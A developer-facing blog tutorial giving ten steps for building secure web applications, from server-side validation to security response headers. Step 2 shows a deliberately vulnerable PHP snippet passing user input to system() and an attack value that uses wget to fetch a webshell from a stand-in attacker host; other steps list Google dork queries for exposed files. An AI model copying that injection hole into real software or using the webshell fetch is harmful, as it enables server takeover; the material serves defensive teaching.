10 Steps to Writing and Developing Secure Applications
Building websites is easy. Building insecure websites is easy. Building secure websites can be easy as well, but it requires one basic behaviour change that most of you will find disconcerting. There are many, many things to take care of while building applications, but let's start with 10 that will give you a head start in securing your applications.
- Don’t trust any data that comes from a form submission
- Don’t trust any data from a drop-down box; use drop-down boxes securely
- When allowing uploading of files, always check the type of file on server side
- Any file that is inside the document root can be referenced using a simple GET request, keep sensitive information out of it
- Always check for data type, boundary conditions for most fields
- Log errors but never display errors to end users
- Any check for authorisation needs to happen at the server side, based on authenticated user
- Any AJAX or XMLHTTPREQUEST can be intercepted and looked at. So always check for authentication and authorization
- Don’t roll your own crypto; use standard, well-known libraries for crypto
- Use response headers newer browsers support to add security for users and applications
Step 1 Don’t trust any data that comes from a form submission
HTML Forms are the primary way humans send data to web sites. The form controls are all part of the HTML spec and don’t require any JavaScript or CSS to function as expected. Developers do make forms look nicer and behave better by using CSS and JavaScript but that is not a necessity.
Since we are talking about HTTP-based web applications, we need to understand that HTTP is primarily a request and response protocol. A web client, usually a web browser, makes a request and a web server sends a response. Therefore, for a successful form submission, all of the following happens first:
1. The browser makes a GET request to the server for the page that contains the HTML code for the form.
2. The server sends the HTML file which contains the form. This is rendered by the browser and shown as form controls to the user.
3. At this point, the user fills the form and clicks on submit.
4. The server gets the data the user filled in and passes it to the application for processing.
So whatever data is sent at step 3 shouldn’t be trusted. This data should be verified and validated, and only then used for further processing. The question is: what can go wrong at step 3?
The first request asked the server for the HTML source code which the browser will show as a form. The response to this is the form code in HTML.
Now the form is on the user’s computer, and so is its HTML source. If the user wants, they can change the HTML code, bypass any length restrictions or hidden fields, and most importantly remove any JavaScript validations a developer might have added.
HTML code gets rendered by the browser to look the way modern forms look, with text fields, buttons, drop-down boxes and so on.
The only defence developers have is to not accept anything that comes from an HTML form without proper validation on the server side. Most users will never try to manipulate forms to bypass restrictions. But the users who do try will mostly go ahead and directly change the values of the data being sent as part of the POST request. This can be done in many ways, the simplest being the use of a browser extension called Tamper Data.
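In fact, you don’t even need a browser at all. Any HTTP client can replay a form submission with arbitrary values, ignoring every client-side restriction. A minimal sketch of such a raw request (the path and field names here are made up for illustration):

POST /profile/update HTTP/1.1
Host: example.com
Content-Type: application/x-www-form-urlencoded

fname=Derek&lname=Jeter&age=999999

The age value sails past any maxlength attribute or JavaScript range check the form may have had, because none of that client-side code runs outside the browser.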
So the form code with its fields etc. looks very different to an attacker and this makes all the difference.
The tampered data and the form code are slightly different here
Another way to do this is to intercept all the data the browser sends and relay it through proxy software. This way the proxy receives all the requests and, subsequently, all the responses.
Experienced developers use similar tools, like Firebug and Fiddler, to troubleshoot problems. The only difference is in the intention and objectives.
Tamper Data makes it extremely trivial to change the values of the parameters being sent, and it does this after the submit button on the form has been clicked. This means that all JavaScript-related checks have already been done by the browser, but the data still hasn’t reached the server it was intended for.
Starting to tamper with data is as easy as clicking a button
Once you realise how simple it is to change the data that can be submitted, you understand the importance of never trusting any data coming from a form submission without proper validation and verification.
Step 2 Don’t trust any data from a drop-down box; use drop-down boxes securely
While we are on the subject of not trusting form data submission, let’s talk about a specific case. I hope that after going through Step 1 you agree with me that form data validation is a must. Sometimes the form data comes from drop-down boxes, i.e. the HTML select and option tags.
Most developers are under the impression that these values can’t be changed. If you are under no such assumption, congratulations, you are already on your way to creating secure applications. But if you are, or were until recently, let’s clear this up completely and permanently.
Let’s take a hypothetical scenario which is so bad that it is highly unlikely in the real world, but which will help us understand this better.
Consider an HTML form that contains commands which can be run on a server. The commands are simple networking-related troubleshooting tools that allow someone with no command-line experience to use the form to understand the state of the network. On the server side, a command is executed based on the input received, and its output is displayed.
Simple form that can be manipulated
It is a simple enough form with two fields. We can choose the command and choose the host we want to test the network command against. So from the drop down box we can select ping, nslookup or traceroute and add an IP address like 8.8.4.4 or host name like www.google.com.
The idea is that the server gets a combination of the command and the host name/IP address and executes the command. Simple functionality which allows anyone with no networking background or command-line experience to execute the commands, see the results and take appropriate action. This kind of form would be quite useful for an Internet Service Provider.
The HTML code powering this form is simple enough, and the part we are interested in is the option tags. Each option has a value which is sent to the server back end.
<select id="cmd" name="cmd" class="form-control">
<option value="ping">ping</option>
<option value="nslookup">nslookup</option>
<option value="traceroute">traceroute</option>
</select>
Can you spot the potential problems with this code? What can go wrong if this form is tampered with and the data changed?
Instead of sending ping, what if we send wget https://attackersite/webshell.php? This will download a file called webshell.php into the current directory, and that can be used to remotely control the server.
<?php
$cmd = $_POST['cmd'];
$host = $_POST['host'];
print("<pre>");
// User input is concatenated straight into a shell command: dangerously insecure
system($cmd . ' ' . $host);
print("</pre>");
?>
So how should we code for such a scenario? How do we ensure that only our whitelisted commands execute, so that we don’t have to trust the input coming from the drop-down box at all?
We can use two security architecture principles to guide us here. First, reduce the attack surface. The attack surface simply means all the places and inputs that can be used to attack the application. In the real world, think of a fielder who can see three stumps to aim at compared to a fielder who can see only one stump. Obviously the job is harder for the fielder who can see only one stump. Second, whitelist what is allowed rather than trying to blacklist what isn’t.
So what we can do is make sure that the option values are not commands. They are numbers starting from zero, and based on the option value we execute a command. We also add a default in case we don’t get a number between zero and two.
// Cast to integer so loose string comparisons can't match unexpected values
$opt = (int) $_POST['option'];
switch ($opt) {
    case 0:
        $cmd = 'ping';
        break;
    case 1:
        $cmd = 'nslookup';
        break;
    case 2:
        $cmd = 'traceroute';
        break;
    default:
        $cmd = 'ping';
}
This drastically reduces the attack surface for the drop-down box. Any value other than an expected number falls through to the default, and the commands that are allowed to execute are whitelisted. This is an example of defensive programming, where we have nullified any tampering that might be attempted and ensured that no unpleasant surprises can happen for this field.
Obviously, we still need to make sure that the hostname field is processed only after validation and not blindly. One possible approach is sketched below.
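A minimal sketch of validating the host field, assuming it is named host as in the earlier snippet; filter_var and escapeshellarg are standard PHP functions:

$host = $_POST['host'];
// Accept only a valid IP address or a plausible hostname
if (filter_var($host, FILTER_VALIDATE_IP) !== false
    or preg_match('/^[a-zA-Z0-9]([a-zA-Z0-9.-]{0,252}[a-zA-Z0-9])?$/', $host))
{
    // escapeshellarg() quotes the value so the shell treats it as a single argument
    system($cmd . ' ' . escapeshellarg($host));
} else {
    print('Invalid host');
}

Even with the whitelist in place, escapeshellarg() acts as a second layer of defence in case the validation ever lets something unexpected through.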
Step 3 How do you know that image a user uploaded, is an actual image?
So many websites allow uploading of images as part of a display picture, profile picture etc. For all practical purposes uploading of an image or any type of file basically means that you are allowing anyone on the whole of the Internet to upload their files on to your server. Would you allow a stranger to put their stuff in your house? Probably not.
As we have seen before, we can’t trust any data coming from a form. The file upload form is no different from forms that accept other kinds of data. Most of the time developers worry about how big a file to allow and what kind of file to allow. While the size check is reliable on the server side, relying on the file name and file extension, which come from the user, is not a good idea at all. From the image we can clearly see that the file name, content type etc. all come from the user and hence cannot be trusted.
Attacker can name a PHP file with a .jpg extension
The typical workflow on the server side for a file upload goes like this:
- HTML form allows for file upload.
- File itself is uploaded to a temporary folder.
- The temporary file is checked for size first.
- If the file size is within limits, the developers check the file extension.
- If the extension matches what is allowed, the file is moved to a folder inside the web server document root.
- At some point during all of this, the required file name, path etc. is copied to the database of the website as well.
Can you figure out what can go wrong? If the server backend supports PHP, a file with PHP code but a wrong extension can get copied to the web server document root. This is completely insecure. Even if the web server configuration is secure and a file name ending with an image extension like .jpg will not be executed as a PHP file, the fact remains that a file full of arbitrary code written by someone else is now part of your website.
How exactly can an attacker accomplish this? The attacker needs to do the following:
- Rename a PHP file as a jpg file.
- While uploading, the attacker will change the values of content type and if required file name.
- If the file is within size limits, then the extension will be checked. Figuring out which file extensions are allowed is quite trivial for an attacker.
- Once the file is moved into the web server document root and no filename was changed, all the attacker needs to do is make a simple GET request to the file with full path.
- Simplest way to make a GET request is to put the full path in the browser address bar.
At this point what the attacker will do, completely depends on their intention. But if their intention was to add a new code file in your website, they just succeeded.
Ideally, whenever a new file is uploaded to a server, the following things should be taken care of (a code sketch follows this list).
- Check the file for size; if it exceeds the limit, don’t process it further.
- Check the file for its magic number. This is a value that identifies the file type to the operating system.
- The magic number, which maps to the MIME type, and not the user-supplied name, should determine the extension of the file.
- Sometimes a file can contain the proper magic number but still contain code as well. Attackers have managed to create such files.
- In such cases, we need to do more investigation before we can copy such files to the web server document root.
- Give the file a random name, with an extension based on the magic number.
- If the functionality demands that images be uploaded, a good test is to try opening the file with an image editing function or library.
- A file that isn’t really an image is likely to fail or come out corrupted when image transforms are applied.
- This is not a foolproof method, but it is likely to work.
- If all of this checks out and we are ready to copy the image to the web server document root, the server configuration should be explicitly set so that no image file is ever confused for a server-side program and executed.
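A minimal sketch of these checks, assuming a standard PHP upload with the fileinfo and GD extensions available; the field name upload, the size limit and the target folder are illustrative:

$tmp = $_FILES['upload']['tmp_name'];

// 1. Size check
if ($_FILES['upload']['size'] > 2 * 1024 * 1024) {
    die('File too large');
}

// 2. MIME check based on the file contents (magic number), not the user-supplied name
$finfo = new finfo(FILEINFO_MIME_TYPE);
$mime = $finfo->file($tmp);
if (!in_array($mime, ['image/jpeg', 'image/png'], true)) {
    die('Not an allowed image type');
}

// 3. Try to decode the image; this fails for files that merely carry an image magic number
$img = ($mime === 'image/jpeg') ? @imagecreatefromjpeg($tmp) : @imagecreatefrompng($tmp);
if ($img === false) {
    die('Corrupt or fake image');
}

// 4. Random name with an extension derived from the verified MIME type,
//    then re-encode, which helps strip any embedded payload
$ext = ($mime === 'image/jpeg') ? 'jpg' : 'png';
$name = bin2hex(random_bytes(16)) . '.' . $ext;
if ($ext === 'jpg') {
    imagejpeg($img, '/var/www/uploads/' . $name);
} else {
    imagepng($img, '/var/www/uploads/' . $name);
}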
Read more about magic numbers on wikipedia https://en.wikipedia.org/wiki/Magic_number_(programming)#Magic_numbers_in_files
*Read more about how a file which has the magic number of a PNG can still be a PHP script. https://www.sentex.net/~mwandel/jhead/ *
I hope you have begun to understand just how incredibly difficult it can be to validate whether an image is an actual image or not. And if our requirement is to test for another type of file, it might be even more complicated.
Step 4 Any resource/file inside a web server document root can be addressed
A Uniform Resource Locator (URL) lets us reach a web resource (a file, document, downloadable file, JavaScript file, CSS file etc.) or a path anywhere on the World Wide Web. Any file, regardless of its type, if located inside what is known as the web server document root, can be addressed using a URL.
A URL gives us a way to address a file. A simplistic example is
http://akashm.com/ip.php
An expansive example of what a URL can look like
Any link which, when clicked, opens your email client is also using a URL scheme (mailto:).
Now we know that any file kept inside the web server document root can be addressed. If it can be addressed, it can be requested using a browser. And just as humans can request it, so can automated programs like search engine crawling bots. This is such an easy win for attackers and security professionals alike that entire databases exist for finding and searching for such files already indexed by a search engine like Google, called the Google Hacking Database (GHDB). https://www.exploit-db.com/google-dorks/
If you search for the following in Google, you will get thousands of search results.
inurl:phpinfo.php PHP Credits
Thousands of websites have php information out in the open
Are there any files you can think of which shouldn’t be visible to users or programs? There are many such files; in fact, security folks have created a good list that you can refer to: https://github.com/pwnwiki/webappurls.
Files that might contain sensitive information, such as database configuration, the state of the server or the installed software, are all of interest to attackers. A lot of the time, the output of long-running scripts, database backups, website backups etc. are present in the document root and can be downloaded by anyone. Web developers use files and folders which are not linked from the website at all, on the theory that if no link is present, no one can discover such hidden files and folders. What they forget is that it only takes a couple of GET requests to figure out whether a particular file or folder exists in the document root. There may be further permission restrictions on a particular file or folder, but if a URL is correct, the resultant HTTP status code will mostly be 200 OK.
So what is the secure way of doing this? Most of the time, important files can be kept out of the document root and still be available to the scripts which are inside it. It is prudent to keep such files in a folder, for example one called private, that sits outside the document root and can never be reached over HTTP. A minimal sketch follows.
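Assuming a typical layout where /var/www/html is the document root (the folder and file names here are illustrative):

/var/www/private/config.php    (not reachable by any URL)
/var/www/html/index.php        (inside the document root)

// Inside index.php: the script can still read the configuration,
// but no GET request can ever fetch config.php directly
require '/var/www/private/config.php';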
Step 5 Always check for data type, boundary conditions for most fields
This is purely about input validation. Security in web applications requires a structured, process-oriented approach. One of the most important things to remember is that if we understand the business requirements, we can build secure applications without too much extra effort.
Based on what we are expecting in the request parameters, our validation functions need to confirm the following:
- That the data we are getting is of the correct data type.
- For the string data type, always confirm the maximum length.
- For integers, check the minimum and maximum values allowed.
- Prefer whitelisting instead of blacklisting of data.
- Prefer object level comparisons rather than assuming that strings are being compared.
- Use regular expressions sparingly and in situations where the data has already been checked for the above.
Most of the time, missing any of the above may not cause a major security hole, but it may allow errors in the functioning of the application or even the display of errors on web pages. This type of information can be leveraged by attackers to chain attacks or to better understand the overall system.
Check if it is a valid username or not
$username = $_POST['username'];
if (is_string($username) and strlen($username) >= 1 and strlen($username) <= 50)
{
// Username is of the right type and length; write some code
}
Check if a numeric id is valid or not
$id = $_POST['id'];
// ctype_digit ensures a whole non-negative number; is_numeric would also accept floats and exponents
if (ctype_digit($id) and $id >= 1 and $id <= 9999)
{
// Write some code
}
Check if lang is whitelisted
$lang = $_GET['lang'];
$langarray = ['en','fr','de','hi','es'];
if(in_array($lang, $langarray))
{
// Write some code
}
The above examples should give you an idea of what we are talking about. The whole process is basically wash, rinse and repeat: it needs to be done for each and every input that the web site will use.
Step 6 Log errors but never display them to users
A lot of web applications “leak” information through errors that reveal internal paths, server usernames, SQL queries, which database is being used and so on. A lot of the time, log files get written inside the document root, which as we saw is readable by anyone, or error conditions generate stack traces that reveal a lot of information about the web application. By itself this may not be a big deal, but if the application has some other flaw that can be misused, it can become extremely dangerous.
The following example will throw a NullPointerException if the parameter “name” is not part of the request:
protected void doPost (HttpServletRequest req, HttpServletResponse res)
throws IOException
{
String name = req.getParameter("name");
...
out.println("hello " + name.trim());
}
Example is from the OWASP page on information leakage
Example of MySQL Error statement revealing username and password for database access
Warning: mysql_pconnect(): Access denied for user: 'root@localhost'
(Using password: N1nj4) in /usr/local/www/wi-data/includes/database.inc
on line 4
Example is from the OWASP page on information leakage
A google dork to find PHP errors logs being written in document root
'PHP Fatal error' 'not found' inurl:error_log
Search for this snippet on Google, you will find thousands of websites leaking information
In Microsoft .NET, an attacker can induce an error due to the security features provided by the framework. Adding HTML and JavaScript tags to any form field (for example, a search box) will trigger a Server Error. If this error is not handled properly and a custom error page is not shown, the resulting error page contains a lot of valuable information for the attacker, including version numbers, a stack trace etc.
A .net page server error revealing information, triggered by bad input provided by an attacker
Step 7 Authorization after Authentication, always on the server side
This is an extremely important step which can make the difference between secured access with confidentiality and integrity for an organisation, and an attacker waltzing away with sensitive data held by the company.
For websites, a simple mapping of page type to what we need can be created:
- Public Page: Unauthenticated
- Private Page: Authenticated
- Restricted Private Page: Authorization
This allows everyone to quickly establish whether a web page requires authenticated access or not. A login page will be public, so that anyone can come and, with proper credentials, gain access to the private pages of the site. Editing a profile will be a private page, but viewing a profile could be public. Any type of admin functionality, admin control panel, user management page etc. should be restricted. A restricted page is a private page (only meant for authenticated users) which also confirms the rights of a particular user to access that page.
Role Based Access Control (RBAC) is the term used to describe such scenarios. An admin user might be able to see the profiles of all the users and even edit those, but a regular user should be able to edit only their own profile settings.
The common trap developers fall into is assuming that a page that is not linked to, or a page that is part of a workflow, will only ever be accessed in the correct sequence and by the authorized person. As we saw in Step 4, any file, link or resource inside the document root can be addressed and requested, so this assumption is incorrect from a security standpoint.
See the following workflow example:
1. https://example.com/buy?action=chooseDataPackage
2. https://example.com/buy?action=customizePackage
3. https://example.com/buy?action=makePayment
4. https://example.com/buy?action=downloadData
*The developer assumes that the user will follow the sequence; an attacker will simply go to the fourth step. From the OWASP cheat sheet on access control https://www.owasp.org/index.php/Access_Control_Cheat_Sheet *
So how does a developer ensure that a workflow is followed and that secure authentication and authorization take place? By following a simple rule: always store state on the server side. Let me explain with an example.
Insecure way of knowing the user level
<input type="text" name="fname" value="Derek">
<input type="text" name="lname" value="Jeter">
<input type="hidden" name="usertype" value="admin">
This data is coming from a form submission, and we already know (read Step 1) that we cannot trust or depend on any data coming from there. Therefore a better way is:
Checking for admin?
$user = $_POST['user'];
if (is_user_admin($user))
{
    // Write code for doing admin stuff
}

function is_user_admin($username)
{
    // Log into the database
    // Get the role for the username
    // If the role matches 'admin' return true, else return false
}
Pseudo code for a simplified example for checking if user is admin or not
The point is that you can trust the code and the data stored in the database on the server side. Use that information to verify and validate the role of a user.
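To make the pseudocode concrete, here is a minimal sketch using PDO; the database credentials, table and column names (users, role, username) are assumptions for illustration:

function is_user_admin($username)
{
    $db = new PDO('mysql:host=localhost;dbname=app', 'appuser', 'secret');
    // A prepared statement keeps the username from being interpreted as SQL
    $stmt = $db->prepare('SELECT role FROM users WHERE username = ?');
    $stmt->execute([$username]);
    return $stmt->fetchColumn() === 'admin';
}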
Checking if workflow is maintained
$workflow_steps = ['chooseDataPackage', 'customizePackage', 'makePayment', 'downloadData'];

// Step 1: no order yet; in a real application this state would live in the session or database
$current_status_of_order = NULL;

if( $current_status_of_order == NULL and chooseDataPackage() )
{
    $current_status_of_order = $workflow_steps[0];
} elseif( $current_status_of_order == $workflow_steps[0] and customizePackage() )
{
    $current_status_of_order = $workflow_steps[1];
} elseif( $current_status_of_order == $workflow_steps[1] and makePayment() )
{
    $current_status_of_order = $workflow_steps[2];
} elseif( $current_status_of_order == $workflow_steps[2] and downloadData() )
{
    $current_status_of_order = $workflow_steps[3];
} else {
    $current_status_of_order = NULL;
    // Something went wrong, do you want to start again?
}
Please note: the code and examples are for illustrating a concept; they may not be optimised, so please excuse any shortcuts.
So the order process required a certain flow, and using logic and language constructs we ensured that it happens. Again, no data from outside the server was relied on in this code snippet.
Step 8 AJAX security means AuthN and AuthZ, always on the server side
This step is basically an extension of the previous one. AJAX, or Asynchronous JavaScript and XML, is a web development technique used on the client side to create asynchronous web applications (from Wikipedia). This boils down to being able to send and receive data from a server without interrupting the current user flow, which makes for a great user experience.
It all sounds great, and everyone, including me, loves it. The security problem that is completely missed is that, in terms of the HTTP request, there is hardly any difference between a regular request and an AJAX-based request. AJAX requests are usually made with the XMLHttpRequest object, and for the end user they act like a magical way to interact with web applications.
Let’s see how a form submitted with AJAX and a form submitted regularly look on the wire.
As you can see, there is no difference at all
So for an attacker, there is no difference between a regular form submission and an AJAX-based form submission. As long as the attacker knows the action of the form (where it is getting submitted to) and the parameters being sent, it is just another POST to them. Therefore everything we understood in Step 1 applies here as well: anything sensitive needs to be verified and validated. A lot of the time, developers forget to add the required authentication and authorization checks which are present for regular web pages. All pages serving AJAX requests also need to have those in place, as in the sketch below.
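A minimal sketch of an endpoint serving AJAX requests, assuming session-based authentication; the session keys and JSON shape are illustrative:

<?php
session_start();

// Same checks as on a regular page: authentication first, authorization second
if (!isset($_SESSION['user_id'])) {
    http_response_code(401);
    exit(json_encode(['error' => 'Not authenticated']));
}
if ($_SESSION['role'] !== 'admin') {
    http_response_code(403);
    exit(json_encode(['error' => 'Not authorized']));
}

// Only now do the actual work and return the data
echo json_encode(['status' => 'ok']);
?>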
Step 9 Always use standard well-known libraries for cryptography
Web applications deal with many different types of data. Some of it needs to be protected in motion, at rest and in use. A standard technique to protect data in these various states is to encrypt it and decrypt it only as and when required.
From Wikipedia
Encryption is the process of encoding messages or information in such a way that only authorized parties can read it. Encryption does not of itself prevent interception, but denies the message content to the interceptor. In an encryption scheme, the message or information, referred to as plaintext, is encrypted using an encryption algorithm, generating ciphertext that can only be read if decrypted.
For technical reasons, an encryption scheme usually uses a pseudo-random encryption key generated by an algorithm. It is in principle possible to decrypt the message without possessing the key, but, for a well-designed encryption scheme, large computational resources and skill are required. An authorised recipient can easily decrypt the message with the key, provided by the originator to recipients but not to unauthorised interceptors.
So basically, for an attacker to bypass encryption, they either need the keys or they need to find security issues with the encryption algorithm itself. Cryptography is a highly specialized subject, and experienced cryptographers always say that one should never create one’s own algorithms for encryption but use the well-known libraries provided as part of one’s language or framework.
Bruce Schneier: “Anyone, from the most clueless amateur to the best cryptographer, can create an algorithm that he himself can’t break. It’s not even hard. What is hard is creating an algorithm that no one else can break, even after years of analysis. And the only way to prove that is to subject the algorithm to years of analysis by the best cryptographers around.”
There are many types of attacks possible against encryption algorithms, categorised by how much knowledge the attacker starts with. Attacks such as timing attacks, brute force attacks and attacks on pseudo-random number generators, often combined with weak implementations, mean that any widely used cryptographic algorithm has had a thorough test of its ability to withstand attack. It therefore has a far better chance of securing data, and keeping it secure for a long time to come, than anything you might be able to create.
There is a very informative thread on Security Stack Exchange that everyone should read:
http://security.stackexchange.com/questions/18197/why-shouldnt-we-roll-our-own
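For example, instead of inventing a password-hashing scheme, PHP ships with password_hash and password_verify, which wrap a vetted algorithm (bcrypt by default). A minimal sketch:

// When the user registers
$hash = password_hash($password, PASSWORD_DEFAULT);
// Store $hash in the database

// When the user logs in
if (password_verify($attempt, $hash)) {
    // Credentials are valid
}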
Step 10 Use modern response headers for security
Finally we are at step 10. We have stopped trusting data coming from browser forms, drop-down boxes and file uploads, understood that anything in the document root can be requested, and realized that every check must happen on the server. Even after all of this, we haven’t covered the complete gamut of attacks and vulnerabilities that are possible against web sites.
HTTP responses contain headers. Newer browsers have added security features so that servers and clients which support and understand certain newer headers can offer more protection. The caveat is that not all headers are supported in all browsers and versions.
Some of the text is from an article I wrote long ago on Security Response Headers https://resources.infosecinstitute.com/http-response-headers/
Set-Cookie with Secure and HttpOnly
We use cookies for maintaining sessions. There are a couple of additional keywords that can be passed to the Set-Cookie header: HttpOnly and Secure. HttpOnly tells the browser that it can’t share the cookie value with the JavaScript running on that page. In modern applications this may or may not be a great idea.
The Secure keyword is useful when the application is served over HTTPS. It tells the browser to send the cookie only when the request is made over the HTTPS scheme, never over plain HTTP. This way the user can’t be tricked into making requests over plain-text HTTP when they are already using HTTPS.
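A sample session cookie with both keywords set (the cookie name and value are illustrative):

Set-Cookie: sessionid=a3fWa81bc; Secure; HttpOnly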
Protecting against Cross Site Scripting
This is a client-side XSS prevention tool. The X-XSS-Protection header tells the browser to actively detect and stop cross-site scripting attacks. It is an interesting response header: if it were fully effective it would be wonderful, but security folks have managed to find bypasses for it. So again, your mileage may vary (YMMV).
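A typical value, which tells the browser to block the page rather than try to sanitise it when an attack is detected:

X-XSS-Protection: 1; mode=block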
Protecting against ClickJacking
Clickjacking is a sneaky attack where an invisible frame covers your website, and whatever the users of your application type or click goes to the invisible frame first. This type of attack, which preys on the trust of the user, is very hard to defend against. One defence that has become popular amongst larger consumer websites like Google, Facebook and Twitter is to refuse to be framed inside another frame or called from an iframe tag.
They achieve this using the X-Frame-Options response header. The value passed to this header either denies framing altogether or allows it only from the same origin. This ensures that no other website can add your site as an iframe and cause clickjacking.
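The two common values look like this:

X-Frame-Options: DENY
X-Frame-Options: SAMEORIGIN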
You can go check the headers for Google, Facebook, Twitter and you will always find this header in their responses.
Strict-Transport-Security
This is an HTTP response header which tells the browser that the site should only ever be loaded over HTTPS. It is required to avoid an attack described by Moxie Marlinspike called SSL Strip, in which even one request sent over HTTP allows the attacker to spoof the HTTPS requests to the website.
Strict-Transport-Security: max-age=expireTime [; includeSubdomains]
This is useful if you insist on accessing your bank’s website while using free public WiFi. The header can’t take care of the very first request the browser makes, which might load the HTTP version. Typically, websites set an expiry time of 100 days (8640000 seconds) to ensure that the header doesn’t expire.
Strict-Transport-Security: max-age=8640000
Twitter uses almost all the headers we discussed
Content Security Policy
Rather than use a patchwork of different HTTP response headers to increase the security of its users, Mozilla decided to tackle the problem slightly differently. They created what is called the Content Security Policy (CSP). Recognising that more and more websites pull active content from various domains, the Content Security Policy allows a website owner to whitelist domains other than their own. This does mean that the onus of protecting those domains is on the website owner.
There are many policy directives that can be set, and the best reference for these is the “Using the Content Security Policy” document hosted on the Mozilla Developer Network wiki. Sample policy:
X-Content-Security-Policy: allow 'self'; img-src *; object-src media1.com media2.com; script-src userscripts.example.com; allow https://payments.example.com
This policy says that all scripts from the same domain are allowed. Image sources can point to any domain (this is a weakness), and objects like Flash can be loaded only from the specified domains. Additionally, the payments subdomain can only be loaded over SSL/TLS.
Modern web applications require modern, upgraded defences. As web applications have become more sophisticated, so have web browsers. This in turn has spurred newer attacks and, consequently, newer defences. We looked at some of the new HTTP response headers being used to protect web users from various kinds of attacks.
That completes our look at 10 steps to writing and developing secure web applications. There are many things we have glossed over, and there is more that can be done. I hope that if you get started with these steps, or validate that you are already taking them, you will be well and truly on your way towards building secure applications.
Published 30 Jul 2016
Originally published at akashm.com on September 28, 2016.